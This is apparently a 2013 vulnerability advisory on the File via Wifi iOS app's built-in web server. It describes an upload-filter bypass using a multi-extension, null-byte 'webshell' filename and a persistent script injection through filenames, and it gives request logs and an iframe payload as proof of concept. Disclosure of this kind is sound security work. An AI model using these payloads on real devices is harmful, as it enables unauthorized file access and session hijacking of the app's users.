Document Title:
===============
File via Wifi v1.3.0 iOS - Multiple Web Vulnerabilities


Date:
=====
2013-06-27


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=990


VL-ID:
=====
990


Common Vulnerability Scoring System:
====================================
7.6


Introduction:
=============
Turn your iPhone into a wireless, mobile external hard drive! All you need to do is type in the given iPhone URL into your web browser, 
and you are instantly connected for transferring files. File Via WiFi also lets you store thousands of Music, PDF, Photos, Word, Excel, 
PowerPoint, and plain text files on your iPhone for viewing documents, articles, memos, outlines, papers, scripts & speeches while anywhere.
With File Via WiFi, you can experience the freedom of having instant access to thousands of important documents, articles, memos, papers 
and notes right in your pocket. File Via WiFi runs on both the iPhone and iPod touch. Requires a connection to a Wi-Fi network to your PC.

File Manager
- Folder management
- Automatic classification and rename of folders
- Copy, move and delete files

File Share
- Transfer files through Wi-Fi connection
- Download and upload files with ease
- iTunes file sharing folder support
- Send multiple files as email attachments
- Open files with other supported apps installed in the device
- Share files via Dropbox

Music Player
- Music playback of mp3, wav, m4a and many other formats
- Get our cool music player to avail playlist, repeat, shuffle and other cool stuffs [Available only on paid version]

PDF Viewer
- Default PDF viewer for PDF reading
- Get our cool PDF viewer to avail cool stuffs [Available only on paid version] such as:
- Fast rendering speed for PDF viewer
- Stylish way of reading PDF files
- Split/Grid view for all the pages in a PDF document for easy viewing
- Quickly open PDF files from email, the web, or any app that supports  Open In... 
- Easy zoom in option while reading the PDF file for a closer view
- Support for portrait and landscape modes Page navigation ?- Quick page browsing
- Select single page or continuous scroll modes
- Bookmark a page or pages in a PDF document and this feature is useful particularly for a PDF document containing large number of pages

Photo Viewer
- Default photo viewer for photo viewing
- Get our cool Photo viewer to avail cool stuffs [Available only on paid version] such as:
- Full Featured Photo Viewer that supports major image formats
- Cool photo slideshow
- See all photos in a single view and many more

(Copy of the Vendor Homepage: https://itunes.apple.com/cn/app/file-via-wifi/id619783710 )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the File via Wifi v1.3.0 apple iOS application.


Report-Timeline:
================
2013-06-28:	Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: File via Wifi v1.3


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
1.1
A local file include and arbitrary file upload web vulnerability via POST method request is detected in the File via Wifi v1.3.0 apple iOS application.
The vulnerability allows remote attackers via POST method to upload files with multiple extensions to unauthorized access them on application-side of the service.

The vulnerability is located in the upload file module of the web-server (http://localhost:8080/) when processing to request a manipulated 
filename via POST. The execution of the injected path or file request will occur when the attacker/target is processing to reload to index listing 
of the affected module. Remote attackers can exchange the filename with a tripple extension to bypass the filter and can execute the files located 
on the little web-server of the application.

Exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard).
Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.

Vulnerable Application(s):
				[+] File via Wifi v1.3.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
				[+] File Upload  (Web Server) [Remote]

Vulnerable Parameter(s):
				[+] filename
				[+] file extensions (multiple)

Affected Module(s):
				[+] FvW File Index Listing


1.2
A persistent input validation web vulnerability is detected in the File via Wifi v1.3.0 apple iOS application.
The bug allows an attacker (remote) to implement/inject malicious script code on the application-side (persistent) of the app web service. 

The vulnerability is located in the index file dir listing module of the webserver (http://localhost:8080/filename) when processing to 
display via POST request method injected manipulated `filenames`. The persistent script code will be executed in the main index file dir 
listing module when the service is processing to list the new malicious injected filename as item.

Exploitation of the persistent web vulnerability requires low or medium user interaction without application user account.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web 
attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation.

Vulnerable Application(s):
				[+] File via Wifi v1.3.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
				[+] Add File

Vulnerable Parameter(s):
				[+] name

Affected Module(s):
				[+] FvW File Index Listing


Proof of Concept:
=================
1.1
The arbitrary file upload web vulnerability can be exploited by remote attackers without privilege application user account and also 
without required user interaction. For demonstration or reproduce ...

PoC:	http://localhost:8080/[filename.multiple-extension]

--- Manipulated Session Request Log  ---


20:34:59.290[342ms][total 342ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[67] Mime Type[text/html]
   Request Headers:
      Host[localhost:8080]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
      
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      
Accept-Encoding[gzip, deflate]
      DNT[1]
      Referer[http://localhost:8080/]
      Connection[keep-alive]
   

Post Data:
      POST_DATA[-----------------------------127341576392
Content-Disposition: form-data; name="newfile"; filename="1337-webshell.png.js.php.txt.html.php.png.png%00"
Content-Type: image/png
ÿØÿà


Reference(s):
http://localhost:8080/



1.2
The persistent inut validation web vulnerability can be exploited by remote attackers without privilege application user account and 
with low required user interaction. For demonstration and reproduce ...


Review: File Via WiFi _ WiFi File Transfer.htm

<a href="http://localhost:8080/files/1337.png" class="file" 
download=""><img src="File%20Via%20WiFi%20_%20WiFi%20File%20Transfer_files/file_icon.png">
>"<iframe src="http://www.vuln-lab.com"></a></td><td class="del"><form action="/files/327.png" method="post">
<input name="_method" value="delete" type="hidden"><input name="commit" value="Delete" class="button" style="color:Red" 
type="submit"></form></td></tr></tbody>
</table>


-- Standard Session Request Log ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[67] Mime Type[text/html]
   Request Headers:
      Host[localhost:8080]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
      
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      
Accept-Encoding[gzip, deflate]
      DNT[1]
      Referer[http://localhost:8080/]
      Connection[keep-alive]
   

Post Data:
      POST_DATA[-----------------------------14201569627317
Content-Disposition: form-data; name="newfile"; filename="327.png"
Content-Type: image/png ÿØÿà


-- Manipulated Session Request Log---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[67] Mime Type[text/html]
   Request Headers:
      Host[localhost:8080]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
      
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      
Accept-Encoding[gzip, deflate]
      DNT[1]
      Referer[http://localhost:8080/]
      Connection[keep-alive]
   

Post Data:
      POST_DATA[-----------------------------14201569627317
Content-Disposition: form-data; name="[PERSISTENT INJECTED SCRIPT CODE!]"; filename="327.png"
Content-Type: image/jpg ÿØÿà


Reference(s):
http://localhost:8080/
http://localhost:8080/filename



Risk:
=====
1.1
The security risk of the arbitrary file upload vulnerability and the multiple extensions issue are estimated as high.

1.2
The security risk of the persistent input validation web vulnerability is estimated as medium(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2013 | Vulnerability Laboratory